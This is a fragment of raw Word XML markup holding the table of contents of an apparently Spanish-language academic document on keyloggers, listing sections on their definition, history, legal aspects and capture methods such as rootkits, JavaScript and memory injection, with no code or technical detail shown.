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5CC292B7" wp14:editId="2F83568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17324F" w:rsidRDefault="0017324F"/>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="158760" tIns="82440" rIns="158760" bIns="82440" anchor="t" anchorCtr="0" compatLnSpc="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5CC292B7"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17324F" w:rsidRDefault="0017324F"/>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9810037"/>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9810038"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>Índice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00E2431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9810037" w:history="1">
        <w:r w:rsidR="00E24312" w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Resumen</w:t>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810037 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00E24312">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E24312" w:rsidRDefault="00E24312">
      <w:pPr>
        <w:pStyle w:val="TDC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc19810038" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Índice</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810038 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</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39" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Introducción</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810039 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</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40" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Contexto</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810040 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</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41" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Definición básica de KEYLOGGER</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810041 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</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42" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Clasificación</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810042 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</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43" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Objetivos</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810043 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</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44" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Historia y Estado del Arte</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810044 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</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45" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Un poco de historia</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810045 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</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46" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Estado del Arte</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810046 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>14</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47" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Aspectos Legales</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810047 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</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48" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>5.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Tipología</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810048 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>21</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49" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Como captura los datos</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810049 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>23</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50" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Captura en keylogger basado en Hardware</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810050 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>23</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51" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Captura en keylogger basado en Software</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810051 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>24</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2" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2.1.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>En una Máquina Virtual</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810052 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>24</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3" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2.2.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Basado en la API.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810053 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>24</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4" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2.3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Como rootkit</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810054 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>25</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5" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2.4.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Basado en Javascript</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810055 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>25</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6" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2.5.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Inyección de memoria.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc19810056 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>27</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7" w:history="1">
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.2.6.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:lang w:eastAsia="es-ES"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00AE04BB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Event Tracing for Windows</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
